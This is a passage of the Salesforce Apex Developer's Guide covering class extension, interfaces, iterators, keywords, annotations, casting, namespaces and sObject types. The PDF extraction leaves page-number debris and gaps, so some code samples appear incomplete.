// accessed through an object instance
// sp.MyGoodStaticProp = 5;
// The following does not produce an error
StaticProperty.MyGoodStaticProp = 5;
65
Extending a Class
Extending a Class
You can extend a class to provide a more specialized behavior.
A class that extends another class inherits all the methods and properties of the extended class. In addition, the extending class can
override the existing virtual methods by using the override keyword in the method definition. Overriding a virtual method allows you
to provide a different implementation for an existing method. This means that the behavior of a particular method is different based on
the object youre calling it on. This is referred to as polymorphism.
A class extends another class using the extends keyword in the class definition. A class can only extend one other class, but it can
implement more than one interface.
This example shows how to extend a class. The YellowMarker class extends the Marker class.
public virtual class Marker {
public virtual void write() {
System.debug('Writing some text.');
}
public virtual Double discount() {
return .05;
}
}
// Extension for the Marker class
public class YellowMarker extends Marker {
public override void write() {
System.debug('Writing some text using the yellow marker.');
}
}
This code segment shows polymorphism. The example declares two objects of the same type (Marker). Even though both objects
are markers, the second object is assigned to an instance of the YellowMarker class. Hence, calling the write method on it yields
a different result than calling this method on the first object because this method has been overridden. Note that we can call the
discount method on the second object even though this method isnt part of the YellowMarker class definition, but it is part
of the extended class, and hence is available to the extending class, YellowMarker.
Marker obj1, obj2;
obj1 = new Marker();
66
The extending class can have more method definitions that arent common with the original extended class. For example, the
RedMarker class below extends the Marker class and has one extra method, computePrice, that isnt available for the
Marker class. To call the extra methods, the object type must be the extending class.
// Extension for the Marker class
public class RedMarker extends Marker {
public override void write() {
System.debug('Writing some text in red.');
}
// Method only in this class
public Double computePrice() {
return 1.5;
}
}
This shows how to call the additional method on the RedMarker class.
RedMarker obj = new RedMarker();
// Call method specific to RedMarker only
Double price = obj.computePrice();
Extensions also apply to interfacesan interface can extend another interface. As with classes, when an interface extends another
interface, all the methods and properties of the extended interface are available to the extending interface.
67
static {
MY_INT = 2;
}
// Member variable for outer class
private final String m;
// Instance initialization block - can be done where the variable is declared,
// or in a constructor
{
m = 'a';
}
// Because no constructor is explicitly defined in this outer class, an implicit,
// no-argument, public constructor exists
// Inner interface
public virtual interface MyInterface {
// No access modifier is necessary for interface methods - these are always
// public or global depending on the interface visibility
void myMethod();
}
// Interface extension
interface MySecondInterface extends MyInterface {
Integer method2(Integer i);
}
// Inner class - because it is virtual it can be extended.
// This class implements an interface that, in turn, extends another interface.
// Consequently the class must implement all methods.
public virtual class InnerClass implements MySecondInterface {
// Inner member variables
private final String s;
private final String s2;
// Inner instance initialization block (this code could be located above)
{
this.s = 'x';
}
// Inline initialization (happens after the block above executes)
private final Integer i = s.length();
// Explicit no argument constructor
InnerClass() {
// This invokes another constructor that is defined later
this('none');
}
// Constructor that assigns a final variable value
public InnerClass(String s2) {
68
this.s2 = s2;
}
// Instance method that implements a method from MyInterface.
// Because it is declared virtual it can be overridden by a subclass.
public virtual void myMethod() { /* does nothing */ }
// Implementation of the second interface method above.
// This method references member variables (with and without the "this" prefix)
public Integer method2(Integer i) { return this.i + s.length(); }
}
// Abstract class (that subclasses the class above). No constructor is needed since
// parent class has a no-argument constructor
public abstract class AbstractChildClass extends InnerClass {
// Override the parent class method with this signature.
// Must use the override keyword
public override void myMethod() { /* do something else */ }
// Same name as parent class method, but different signature.
// This is a different method (displaying polymorphism) so it does not need
// to use the override keyword
protected void method2() {}
// Abstract method - subclasses of this class must implement this method
abstract Integer abstractMethod();
}
// Complete the abstract class by implementing its abstract method
public class ConcreteChildClass extends AbstractChildClass {
// Here we expand the visibility of the parent method - note that visibility
// cannot be restricted by a sub-class
public override Integer abstractMethod() { return 5; }
}
// A second sub-class of the original InnerClass
public class AnotherChildClass extends InnerClass {
AnotherChildClass(String s) {
// Explicitly invoke a different super constructor than one with no arguments
super(s);
}
}
// Exception inner class
public virtual class MyException extends Exception {
// Exception class member variable
public Double d;
// Exception class constructor
MyException(Double d) {
this.d = d;
}
69
70
Understanding Interfaces
Understanding Interfaces
An interface is like a class in which none of the methods have been implementedthe method signatures are there, but the body of
each method is empty. To use an interface, another class must implement it by providing a body for all of the methods contained in the
interface.
Interfaces can provide a layer of abstraction to your code. They separate the specific implementation of a method from the declaration
for that method. This way you can have different implementations of a method based on your specific application.
Defining an interface is similar to defining a new class. For example, a company might have two types of purchase orders, ones that
come from customers, and others that come from their employees. Both are a type of purchase order. Suppose you needed a method
to provide a discount. The amount of the discount can depend on the type of purchase order.
You can model the general concept of a purchase order as an interface and have specific implementations for customers and employees.
In the following example the focus is only on the discount aspect of a purchase order.
This is the definition of the PurchaseOrder interface.
// An interface that defines what a purchase order looks like in general
public interface PurchaseOrder {
// All other functionality excluded
Double discount();
}
This class implements the PurchaseOrder interface for customer purchase orders.
// One implementation of the interface for customers
public class CustomerPurchaseOrder implements PurchaseOrder {
public Double discount() {
return .05; // Flat 5% discount
71
Custom Iterators
}
}
This class implements the PurchaseOrder interface for employee purchase orders.
// Another implementation of the interface for employees
public class EmployeePurchaseOrder implements PurchaseOrder {
public Double discount() {
return .10; // Its worth it being an employee! 10% discount
}
}
Custom Iterators
An iterator traverses through every item in a collection. For example, in a while loop in Apex, you define a condition for exiting the
loop, and you must provide some means of traversing the collection, that is, an iterator. In the following example, count is incremented
by 1 every time the loop is executed (count++) :
while (count < 11) {
System.debug(count);
count++;
}
Using the Iterator interface you can create a custom set of instructions for traversing a List through a loop. This is useful for data
that exists in sources outside of Salesforce that you would normally define the scope of using a SELECT statement. Iterators can also
be used if you have multiple SELECT statements.
Arguments
Returns
Description
hasNext
Boolean
next
Any type
72
Custom Iterators
Arguments
iterator
Returns
Description
Iterator class
The iterator method must be declared as global or public. It creates a reference to the iterator that you can then use to
traverse the data structure.
In the following example a custom iterator iterates through a collection:
global class CustomIterable
implements Iterator<Account>{
List<Account> accs {get; set;}
Integer i {get; set;}
public CustomIterable(){
accs =
[SELECT Id, Name,
NumberOfEmployees
FROM Account
WHERE Name = 'false'];
i = 0;
}
global boolean hasNext(){
if(i >= accs.size()) {
return false;
} else {
return true;
}
}
global
//
//
//
Account next(){
8 is an arbitrary
constant in this example
that represents the
73
Keywords
Keywords
Apex has the following keywords available:
final
instanceof
super
this
transient
with sharing and without sharing
74
Member final variables can be changed in initialization code blocks, constructors, or with other variable declarations.
To define a constant, mark a variable as both static and final.
Non-final static variables are used to communicate state at the class level (such as state between triggers). However, they are not
shared across requests.
Methods and classes are final by default. You cannot use the final keyword in the declaration of a class or method. This means
they cannot be overridden. Use the virtual keyword if you need to override a method or class.
Note: In Apex saved with API version 32.0 and later, instanceof returns false if the left operand is a null object. For
example, the following sample returns false.
Object o = null;
Boolean result = o instanceof Account;
System.assertEquals(false, result);
In API version 31.0 and earlier, instanceof returns true in this case.
75
mySalutation = salutation;
myFirstName = firstName;
myLastName = lastName;
}
public virtual void printName() {
System.debug('My name is ' + mySalutation + myLastName);
}
public virtual String getFirstName() {
return myFirstName;
}
}
You can create the following class that extends Superclass and overrides its printName method:
public class Subclass extends Superclass {
public override void printName() {
super.printName();
System.debug('But you can call me ' + super.getFirstName());
}
}
The expected output when calling Subclass.printName is My name is Mr. Vonderburg. But you can call
me Carl.
You can also use super to call constructors. Add the following constructor to SubClass:
public Subclass() {
super('Madam', 'Brenda', 'Clapentrap');
}
Now, the expected output of Subclass.printName is My name is Madam Clapentrap. But you can call
me Brenda.
76
In the above example, the class myTestThis declares an instance variable s. The initialization code populates the variable using the
this keyword.
Or you can use the this keyword to do constructor chaining, that is, in one constructor, call another constructor. In this format, use
the this keyword with parentheses. For example:
public class testThis {
// First constructor for the class. It requires a string parameter.
public testThis(string s2) {
}
// Second constructor for the class. It does not require a parameter.
// This constructor calls the first constructor using the this keyword.
public testThis() {
this('None');
}
}
When you use the this keyword in a constructor to do constructor chaining, it must be the first statement in the constructor.
You can also use the transient keyword in Apex classes that are serializable, namely in controllers, controller extensions, or classes
that implement the Batchable or Schedulable interface. In addition, you can use transient in classes that define the types
of fields declared in the serializable classes.
Declaring variables as transient reduces view state size. A common use case for the transient keyword is a field on a Visualforce
page that is needed only for the duration of a page request, but should not be part of the page's view state and would use too many
system resources to be recomputed many times during a request.
Some Apex objects are automatically considered transient, that is, their value does not get saved as part of the page's view state. These
objects include the following:
PageReferences
XmlStream classes
Collections automatically marked as transient only if the type of object that they hold is automatically marked as transient, such as
a collection of Savepoints
Most of the objects generated by system methods, such as Schema.getGlobalDescribe.
JSONParser class instances.
Static variables also don't get transmitted through the view state.
The following example contains both a Visualforce page and a custom controller. Clicking the refresh button on the page causes the
transient date to be updated because it is being recreated each time the page is refreshed. The non-transient date continues to have
its original value, which has been deserialized from the view state, so it remains the same.
<apex:page controller="ExampleController">
T1: {!t1} <br/>
T2: {!t2} <br/>
77
<apex:form>
<apex:commandLink value="refresh"/>
</apex:form>
</apex:page>
public class ExampleController {
DateTime t1;
transient DateTime t2;
public String getT1() {
if (t1 == null) t1 = System.now();
return '' + t1;
}
public String getT2() {
if (t2 == null) t2 = System.now();
return '' + t2;
}
}
SEE ALSO:
JSONParser Class
Use the without sharing keywords when declaring a class to ensure that the sharing rules for the current user are not enforced.
For example:
public without sharing class noSharing {
// Code here
}
78
Annotations
The sharing setting of the class where the method is defined is applied, not of the class where the method is called. For example, if
a method is defined in a class declared with with sharing is called by a class declared with without sharing, the method
will execute with sharing rules enforced.
If a class isnt declared as either with or without sharing, the current sharing rules remain in effect. This means that if the class is called
by a class that has sharing enforced, then sharing is enforced for the called class.
Both inner classes and outer classes can be declared as with sharing. The sharing setting applies to all code contained in the
class, including initialization code, constructors, and methods.
Inner classes do not inherit the sharing setting from their container class.
Classes inherit this setting from a parent class when one class extends or implements another.
Annotations
An Apex annotation modifies the way a method or class is used, similar to annotations in Java.
Annotations are defined with an initial @ symbol, followed by the appropriate keyword. To add an annotation to a method, specify it
immediately before the method or class definition. For example:
global class MyClass {
@future
Public static void myMethod(String a)
{
//long-running Apex code
}
}
Deprecated Annotation
Use the deprecated annotation to identify methods, classes, exceptions, enums, interfaces, or variables that can no longer be
referenced in subsequent releases of the managed package in which they reside. This is useful when you are refactoring code in managed
79
Future Annotation
packages as the requirements evolve. New subscribers cannot see the deprecated elements, while the elements continue to function
for existing subscribers and API integrations.
The following code snippet shows a deprecated method. The same syntax can be used to deprecate classes, exceptions, enums, interfaces,
or variables.
@deprecated
// This method is deprecated. Use myOptimizedMethod(String a, String b) instead.
global void myMethod(String a) {
}
Future Annotation
Use the future annotation to identify methods that are executed asynchronously. When you specify future, the method executes
when Salesforce has available resources.
For example, you can use the future annotation when making an asynchronous Web service callout to an external service. Without
the annotation, the Web service callout is made from the same thread that is executing the Apex code, and no additional processing
can occur until the callout is complete (synchronous processing).
Methods with the future annotation must be static methods, and can only return a void type. The specified parameters must be
primitive data types, arrays of primitive data types, or collections of primitive data types. Methods with the future annotation cannot
take sObjects or objects as arguments.
To make a method in a class execute asynchronously, define the method with the future annotation. For example:
global class MyFutureClass {
@future
static void myMethod(String a, Integer i) {
System.debug('Method called with: ' + a + ' and ' + i);
// Perform long-running code
}
}
Specify (callout=true) to allow callouts in a future method. Specify (callout=false) to prevent a method from making
callouts.
80
IsTest Annotation
The following snippet shows how to specify that a method executes a callout:
@future (callout=true)
public static void doCalloutFromFuture() {
//Add code to perform callout
}
IsTest Annotation
Use the isTest annotation to define classes and methods that only contain code used for testing your application. The isTest
annotation on methods is equivalent to the testMethod keyword.
Note: Classes defined with the isTest annotation don't count against your organization limit of 3 MB for all Apex code.
Classes and methods defined as isTest can be either private or public. Classes defined as isTest must be top-level classes.
This is an example of a private test class that contains two test methods.
@isTest
private class MyTestClass {
// Methods for testing
@isTest static void test1() {
// Implement test code
}
@isTest static void test2() {
// Implement test code
}
}
This is an example of a public test class that contains utility methods for test data creation:
@isTest
public class TestUtil {
public static void createTestAccounts() {
// Create some test accounts
}
public static void createTestContacts() {
81
IsTest Annotation
IsTest(SeeAllData=true) Annotation
For Apex code saved using Salesforce API version 24.0 and later, use the isTest(SeeAllData=true) annotation to grant test
classes and individual test methods access to all data in the organization, including pre-existing data that the test didnt create. Starting
with Apex code saved using Salesforce API version 24.0, test methods dont have access by default to pre-existing data in the organization.
However, test code saved against Salesforce API version 23.0 and earlier continues to have access to all data in the organization and its
data access is unchanged. See Isolation of Test Data from Organization Data in Unit Tests on page 420.
Considerations for the IsTest(SeeAllData=true) Annotation
If a test class is defined with the isTest(SeeAllData=true) annotation, this annotation applies to all its test methods
whether the test methods are defined with the @isTest annotation or the testmethod keyword.
The isTest(SeeAllData=true) annotation is used to open up data access when applied at the class or method level.
However, using isTest(SeeAllData=false) on a method doesnt restrict organization data access for that method
if the containing class has already been defined with the isTest(SeeAllData=true) annotation. In this case, the
method will still have access to all the data in the organization.
This example shows how to define a test class with the isTest(SeeAllData=true) annotation. All the test methods in this
class have access to all data in the organization.
// All test methods in this class can access all data.
@isTest(SeeAllData=true)
public class TestDataAccessClass {
// This test accesses an existing account.
// It also creates and accesses a new test account.
static testmethod void myTestMethod1() {
// Query an existing account in the organization.
Account a = [SELECT Id, Name FROM Account WHERE Name='Acme' LIMIT 1];
System.assert(a != null);
// Create a test account based on the queried account.
Account testAccount = a.clone();
testAccount.Name = 'Acme Test';
insert testAccount;
// Query the test account that was inserted.
Account testAccount2 = [SELECT Id, Name FROM Account
WHERE Name='Acme Test' LIMIT 1];
System.assert(testAccount2 != null);
}
// Like the previous method, this test method can also access all data
// because the containing class is annotated with @isTest(SeeAllData=true).
82
IsTest Annotation
This second example shows how to apply the isTest(SeeAllData=true) annotation on a test method. Because the class that
the test method is contained in isnt defined with this annotation, you have to apply this annotation on the test method to enable access
to all data for that test method. The second test method doesnt have this annotation, so it can access only the data it creates in addition
to objects that are used to manage your organization, such as users.
// This class contains test methods with different data access levels.
@isTest
private class ClassWithDifferentDataAccess {
// Test method that has access to all data.
@isTest(SeeAllData=true)
static void testWithAllDataAccess() {
// Can query all data in the organization.
}
// Test method that has access to only the data it creates
// and organization setup and metadata objects.
@isTest static void testWithOwnDataAccess() {
// This method can still access the User object.
// This query returns the first user object.
User u = [SELECT UserName,Email FROM User LIMIT 1];
System.debug('UserName: ' + u.UserName);
System.debug('Email: ' + u.Email);
// Can access the test account that is created here.
Account a = new Account(Name='Test Account');
insert a;
// Access the account that was just created.
Account insertedAcct = [SELECT Id,Name FROM Account
WHERE Name='Test Account'];
System.assert(insertedAcct != null);
}
}
IsTest(OnInstall=true) Annotation
Use the IsTest(OnInstall=true) annotation to specify which Apex tests are executed during package installation. This
annotation is used for tests in managed or unmanaged packages. Only test methods with this annotation, or methods that are part of
a test class that has this annotation, will be executed during package installation. Tests annotated to run during package installation
must pass in order for the package installation to succeed. It is no longer possible to bypass a failing test during package installation. A
test method or a class that doesn't have this annotation, or that is annotated with isTest(OnInstall=false) or isTest,
won't be executed during installation.
This example shows how to annotate a test method that will be executed during package installation. In this example, test1 will be
executed but test2 and test3 won't.
public class OnInstallClass {
// Implement logic for the class.
83
ReadOnly Annotation
ReadOnly Annotation
The @ReadOnly annotation allows you to perform unrestricted queries against the Force.com database. All other limits still apply. It's
important to note that this annotation, while removing the limit of the number of returned rows for a request, blocks you from performing
the following operations within the request: DML operations, calls to System.schedule, calls to methods annotated with @future,
and sending emails.
The @ReadOnly annotation is available for Web services and the Schedulable interface. To use the @ReadOnly annotation,
the top level request must be in the schedule execution or the Web service invocation. For example, if a Visualforce page calls a Web
service that contains the @ReadOnly annotation, the request fails because Visualforce is the top level request, not the Web service.
Visualforce pages can call controller methods with the @ReadOnly annotation, and those methods will run with the same relaxed
restrictions. To increase other Visualforce-specific limits, such as the size of a collection that can be used by an iteration component like
<apex:pageBlockTable>, you can set the readonly attribute on the <apex:page> tag to true. For more information,
see Working with Large Sets of Data in the Visualforce Developer's Guide.
RemoteAction Annotation
The RemoteAction annotation provides support for Apex methods used in Visualforce to be called via JavaScript. This process is
often referred to as JavaScript remoting.
Note: Methods with the RemoteAction annotation must be static and either global or public.
84
TestVisible Annotation
To use JavaScript remoting in a Visualforce page, add the request as a JavaScript invocation with the following form:
[namespace.]controller.method(
[parameters...,]
callbackFunction,
[configuration]
);
namespace is the namespace of the controller class. This is required if your organization has a namespace defined, or if the class
comes from an installed package.
controller is the name of your Apex controller.
method is the name of the Apex method youre calling.
parameters is the comma-separated list of parameters that your method takes.
callbackFunction is the name of the JavaScript function that will handle the response from the controller. You can also
declare an anonymous function inline. callbackFunction receives the status of the method call and the result as parameters.
configuration configures the handling of the remote call and response. Use this to change the behavior of a remoting call,
such as whether or not to escape the Apex methods response.
In your controller, your Apex method declaration is preceded with the @RemoteAction annotation like this:
@RemoteAction
global static String getItemId(String objectName) { ... }
Your method can take Apex primitives, collections, typed and generic sObjects, and user-defined Apex classes and interfaces as arguments.
Generic sObjects must have an ID or sobjectType value to identify actual type. Interface parameters must have an apexType to identify
actual type. Your method can return Apex primitives, sObjects, collections, user-defined Apex classes and enums, SaveResult,
UpsertResult, DeleteResult, SelectOption, or PageReference.
For more information, see JavaScript Remoting for Apex Controllers in the Visualforce Developer's Guide.
TestVisible Annotation
Use the TestVisible annotation to allow test methods to access private or protected members of another class outside the test
class. These members include methods, member variables, and inner classes. This annotation enables a more permissive access level
for running tests only. This annotation doesnt change the visibility of members if accessed by non-test classes.
With this annotation, you dont have to change the access modifiers of your methods and member variables to public if you want to
access them in a test method. For example, if a private member variable isnt supposed to be exposed to external classes but it should
be accessible by a test method, you can add the TestVisible annotation to the variable definition.
This example shows how to annotate a private class member variable and private method with TestVisible.
public class TestVisibleExample {
// Private member variable
@TestVisible private static Integer recordNumber = 1;
// Private method
@TestVisible private static void updateRecord(String name) {
// Do something
}
}
85
This is the test class that uses the previous class. It contains the test method that accesses the annotated member variable and method.
@isTest
private class TestVisibleExampleTest {
@isTest static void test1() {
// Access private variable annotated with TestVisible
Integer i = TestVisibleExample.recordNumber;
System.assertEquals(1, i);
// Access private method annotated with TestVisible
TestVisibleExample.updateRecord('RecordName');
// Perform some verification
}
}
RestResource Annotation
The @RestResource annotation is used at the class level and enables you to expose an Apex class as a REST resource.
These are some considerations when using this annotation:
The URL mapping is relative to https://instance.salesforce.com/services/apexrest/.
A wildcard character (*) may be used.
The URL mapping is case-sensitive. A URL mapping for my_url will only match a REST resource containing my_url and not
My_Url.
To use this annotation, your Apex class must be defined as global.
URL Guidelines
URL path mappings are as follows:
The path must begin with a '/'
If an '*' appears, it must be preceded by '/' and followed by '/', unless the '*' is the last character, in which case it need not be followed
by '/'
The rules for mapping URLs are:
An exact match always wins.
If no exact match is found, find all the patterns with wildcards that match, and then select the longest (by string length) of those.
If no wildcard match is found, an HTTP response status code 404 is returned.
86
The URL for a namespaced classes contains the namespace. For example, if your class is in namespace abc and the class is mapped to
your_url, then the API URL is modified as follows:
https://instance.salesforce.com/services/apexrest/abc/your_url/. In the case of a URL collision, the
namespaced class is always used.
HttpDelete Annotation
The @HttpDelete annotation is used at the method level and enables you to expose an Apex method as a REST resource. This
method is called when an HTTP DELETE request is sent, and deletes the specified resource.
To use this annotation, your Apex method must be defined as global static.
HttpGet Annotation
The @HttpGet annotation is used at the method level and enables you to expose an Apex method as a REST resource. This method
is called when an HTTP GET request is sent, and returns the specified resource.
These are some considerations when using this annotation:
To use this annotation, your Apex method must be defined as global static.
Methods annotated with @HttpGet are also called if the HTTP request uses the HEAD request method.
HttpPatch Annotation
The @HttpPatch annotation is used at the method level and enables you to expose an Apex method as a REST resource. This method
is called when an HTTP PATCH request is sent, and updates the specified resource.
To use this annotation, your Apex method must be defined as global static.
HttpPost Annotation
The @HttpPost annotation is used at the method level and enables you to expose an Apex method as a REST resource. This method
is called when an HTTP POST request is sent, and creates a new resource.
To use this annotation, your Apex method must be defined as global static.
HttpPut Annotation
The @HttpPut annotation is used at the method level and enables you to expose an Apex method as a REST resource. This method
is called when an HTTP PUT request is sent, and creates or updates the specified resource.
To use this annotation, your Apex method must be defined as global static.
87
In the following code block, first, a custom report object is added to a list of report objects. After that, the custom report object is returned
as a report object, then is cast back into a custom report object.
Public virtual class Report {
Public class CustomReport extends Report {
// Create a list of report objects
Report[] Reports = new Report[5];
// Create a custom report object
CustomReport a = new CustomReport();
// Because the custom report is a sub class of the Report class,
// you can add the custom report object a to the list of report objects
Reports.add(a);
//
//
//
//
The following is not legal, because the compiler does not know that what you are
returning is a custom report. You must use cast to tell it that you know what
type you are returning
CustomReport c = Reports.get(0);
// Instead, get the first item in the list by casting it back to a custom report object
CustomReport c = (CustomReport) Reports.get(0);
}
}
88
Casting Example
In addition, an interface type can be cast to a sub-interface or a class type that implements that interface.
Tip: To verify if a class is a specific type of class, use the instanceOf keyword. For more information, see Using the
instanceof Keyword on page 75.
Collection Casting
Because collections in Apex have a declared type at runtime, Apex allows collection casting.
89
Collections can be cast in a similar manner that arrays can be cast in Java. For example, a list of CustomerPurchaseOrder objects can be
assigned to a list of PurchaseOrder objects if class CustomerPurchaseOrder is a child of class PurchaseOrder.
public virtual class PurchaseOrder {
Public class CustomerPurchaseOrder extends PurchaseOrder {
}
{
List<PurchaseOrder> POs = new PurchaseOrder[] {};
List<CustomerPurchaseOrder> CPOs = new CustomerPurchaseOrder[]{};
POs = CPOs;}
}
Once the CustomerPurchaseOrder list is assigned to the PurchaseOrder list variable, it can be cast back to a list of
CustomerPurchaseOrder objects, but only because that instance was originally instantiated as a list of CustomerPurchaseOrder. A list of
PurchaseOrder objects that is instantiated as such cannot be cast to a list of CustomerPurchaseOrder objects, even if the list of
PurchaseOrder objects contains only CustomerPurchaseOrder objects.
If the user of a PurchaseOrder list that only includes CustomerPurchaseOrders objects tries to insert a non-CustomerPurchaseOrder
subclass of PurchaseOrder (such as InternalPurchaseOrder), a runtime exception results. This is because Apex collections
have a declared type at runtime.
Note: Maps behave in the same way as lists with regards to the value side of the Mapif the value side of map A can be cast to
the value side of map B, and they have the same key type, then map A can be cast to map B. A runtime error results if the casting
is not valid with the particular map at runtime.
90
91
Naming Conventions
To replace a found search string with another string, enter the new string in the Replace textbox and click replace to replace
just that instance, or Replace All to replace that instance and all other instances of the search string that occur in the page, class,
or trigger.
To make the search operation case sensitive, select the Match Case option.
To use a regular expression as your search string, select the Regular Expressions option. The regular expressions follow
JavaScript's regular expression rules. A search using regular expressions can find strings that wrap over more than one line.
If you use the replace operation with a string found by a regular expression, the replace operation can also bind regular expression
group variables ($1, $2, and so on) from the found search string. For example, to replace an <h1> tag with an <h2> tag and
keep all the attributes on the original <h1> intact, search for <h1(\s+)(.*)> and replace it with <h2$1$2>.
Go to line ( )
This button allows you to highlight a specified line number. If the line is not currently visible, the editor scrolls to that line.
Undo ( ) and Redo ( )
Use undo to reverse an editing action and redo to recreate an editing action that was undone.
Font size
Select a font size from the drop-down list to control the size of the characters displayed in the editor.
Line and column position
The line and column position of the cursor is displayed in the status bar at the bottom of the editor. This can be used with go to line
(
Naming Conventions
We recommend following Java standards for naming, that is, classes start with a capital letter, methods start with a lowercase verb, and
variable names should be meaningful.
It is not legal to define a class and interface with the same name in the same class. It is also not legal for an inner class to have the same
name as its outer class. However, methods and variables have their own namespaces within the class so these three types of names do
not clash with each other. In particular it is legal for a variable, method, and a class within a class to have the same name.
Name Shadowing
Member variables can be shadowed by local variablesin particular function arguments. This allows methods and constructors of the
standard Java form:
Public Class Shadow {
String s;
Shadow(String s) { this.s = s; } // Same name ok
setS(String s) { this.s = s; } // Same name ok
}
Member variables in one class can shadow member variables with the same name in a parent classes. This can be useful if the two classes
are in different top-level classes and written by different teams. For example, if one has a reference to a class C and wants to gain access
to a member variable M in parent class P (with the same name as a member variable in C) the reference should be assigned to a reference
to P first.
Static variables can be shadowed across the class hierarchyso if P defines a static S, a subclass C can also declare a static S. References
to S inside C refer to that staticin order to reference the one in P, the syntax P.S must be used.
92
Namespace Prefix
Static class variables cannot be referenced through a class instance. They must be referenced using the raw variable name by itself (inside
that top-level class file) or prefixed with the class name. For example:
public class p1 {
public static final Integer CLASS_INT = 1;
public class c { };
}
p1.c c = new p1.c();
// This is illegal
// Integer i = c.CLASS_INT;
// This is correct
Integer i = p1.CLASS_INT;
Namespace Prefix
The Salesforce application supports the use of namespace prefixes. Namespace prefixes are used in managed Force.com AppExchange
packages to differentiate custom object and field names from those in use by other organizations. After a developer registers a globally
unique namespace prefix and registers it with AppExchange registry, external references to custom object and field names in the
developer's managed packages take on the following long format:
namespace_prefix__obj_or_field_name__c
Because these fully-qualified names can be onerous to update in working SOQL statements, SOSL statements, and Apex once a class is
marked as managed, Apex supports a default namespace for schema names. When looking at identifiers, the parser considers the
namespace of the current object and then assumes that it is the namespace of all other objects and fields unless otherwise specified.
Consequently, a stored class should refer to custom object and field names directly (using obj_or_field_name__c) for those
objects that are defined within its same application namespace.
Tip: Only use namespace prefixes when referring to custom objects and fields in managed packages that have been installed to
your organization from theAppExchange.
And:
URL url1 = new URL('http://na1.salesforce.com');
Similarly, to call a static method on the URL class, you can write either of the following:
System.URL.getCurrentRequestUrl();
93
Or:
URL.getCurrentRequestUrl();
Note: In addition to the System namespace, there is a built-in System class in the System namespace, which provides
methods like assertEquals and debug. Dont get confused by the fact that both the namespace and the class have the
same name in this case. The System.debug('debug message'); and System.System.debug('debug
message'); statements are equivalent.
When the Database.query statement executes, Apex looks up the query method on the custom Database class first. However,
the query method in this class doesnt take any parameters and no match is found, hence you get an error. The custom Database
class overrides the built-in Database class in the System namespace. To solve this problem, add the System namespace prefix
to the class name to explicitly instruct the Apex runtime to call the query method on the built-in Database class in the System
namespace:
sObject[] acct = System.Database.query('SELECT Name FROM Account LIMIT 1);
System.debug(acct[0].get('Name'));
94
1. The parser first assumes that name1 is a local variable with name2 - nameM as field references, and nameN as a method
invocation.
2. If the first assumption does not hold true:
If the expression contains only two identifiers (name1.name2()), the parser then assumes that name1 is a class name and
name2 is a method invocation.
If the expression contains more than two identifiers, the parser then assumes that name1 is a class name, name2 is a static
variable name with name3 - nameM as field references, and nameN is a method invocation.
3. If the second assumption does not hold true, the parser then assumes that name1 is a namespace name, name2 is a class name,
name3 is a static variable name, name4 - nameM are field references, and nameN is a method invocation.
4. If the third assumption does not hold true, the parser reports an error.
However, with class variables Apex also uses dot notation to reference member variables. Those member variables might refer to other
class instances, or they might refer to an sObject which has its own dot notation rules to refer to field names (possibly navigating foreign
keys).
Once you enter an sObject field in the expression, the remainder of the expression stays within the sObject domain, that is, sObject fields
cannot refer back to Apex expressions.
For instance, if you have the following class:
public class c {
c1 c1 = new c1();
class c1 { c2 c2; }
class c2 { Account a; }
}
95
package referenced by the class are saved too. This ensures that as Apex, the API, and the components in managed packages evolve in
subsequent released versions, a class or trigger is still bound to versions with specific, known behavior.
Setting a version for an installed package determines the exposed interface and behavior of any Apex code in the installed package. This
allows you to continue to reference Apex that may be deprecated in the latest version of an installed package, if you installed a version
of the package before the code was deprecated.
Typically, you reference the latest Salesforce API version and each installed package version. If you save an Apex class or trigger without
specifying the Salesforce API version, the class or trigger is associated with the latest installed version by default. If you save an Apex
class or trigger that references a managed package without specifying a version of the managed package, the class or trigger is associated
with the latest installed version of the managed package by default.
96
97
When using a custom type (your Apex class) for the map key or set elements, provide equals and hashCode methods in your
class. Apex uses these two methods to determine equality and uniqueness of keys for your objects.
Keep in mind the following when implementing the equals method. Assuming x, y, and z are non-null instances of your class,
the equals method must be:
Reflexive: x.equals(x)
Symmetric: x.equals(y) should return true if and only if y.equals(x) returns true
Transitive: if x.equals(y) returns true and y.equals(z) returns true, then x.equals(z) should return true
Consistent: multiple invocations of x.equals(y) consistently return true or consistently return false
For any non-null reference value x, x.equals(null) should return false
The equals method in Apex is based on the equals method in Java.
The hashCode method with this signature:
public Integer hashCode() {
// Your implementation
}
98
Sample
This sample shows how to implement the equals and hashCode methods. The class that provides those methods is listed first. It
also contains a constructor that takes two Integers. The second example is a code snippet that creates three objects of the class, two of
which have the same values. Next, map entries are added using the pair objects as keys. The sample verifies that the map has only two
entries since the entry that was added last has the same key as the first entry, and hence, overwrote it. The sample then uses the ==
operator, which works as expected because the class implements equals. Also, some additional map operations are performed, like
checking whether the map contains certain keys, and writing all keys and values to the debug log. Finally, the sample creates a set and
adds the same objects to it. It verifies that the set size is two, since only two objects out of the three are unique.
public class PairNumbers {
Integer x,y;
public PairNumbers(Integer a, Integer b) {
x=a;
y=b;
}
public Boolean equals(Object obj) {
if (obj instanceof PairNumbers) {
PairNumbers p = (PairNumbers)obj;
return ((x==p.x) && (y==p.y));
}
return false;
}
public Integer hashCode() {
return (31 * x) ^ y;
}
}
99
100
CHAPTER 7
In this chapter ...
sObject Types
Adding and
Retrieving Data
DML
sObject Collections
Dynamic Apex
Custom Settings
101
sObject Types
sObject Types
In this developer's guide, the term sObject refers to any object that can be stored in the Force.com platform database. An sObject
variable represents a row of data and can only be declared in Apex using the SOAP API name of the object. For example:
Account a = new Account();
MyCustomObject__c co = new MyCustomObject__c();
Similar to the SOAP API, Apex allows the use of the generic sObject abstract type to represent any object. The sObject data type can be
used in code that processes different types of sObjects.
The new operator still requires a concrete sObject type, so all instances are specific sObjects. For example:
sObject s = new Account();
You can also use casting between the generic sObject type and the specific sObject type. For example:
// Cast the generic variable s from the example above
// into a specific account and account variable a
Account a = (Account)s;
// The following generates a runtime error
Contact c = (Contact)s;
Because sObjects work like objects, you can also have the following:
Object obj = s;
// and
a = (Account)obj;
DML operations work on variables declared as the generic sObject data type as well as with regular sObjects.
sObject variables are initialized to null, but can be assigned a valid object reference with the new operator. For example:
Account a = new Account();
Developers can also specify initial field values with comma-separated name = value pairs when instantiating a new sObject. For
example:
Account a = new Account(name = 'Acme', billingcity = 'San Francisco');
For information on accessing existing sObjects from the Force.com platform database, see SOQL and SOSL Queries in the Force.com
SOQL and SOSL Reference.
Note: The ID of an sObject is a read-only value and can never be modified explicitly in Apex unless it is cleared during a clone
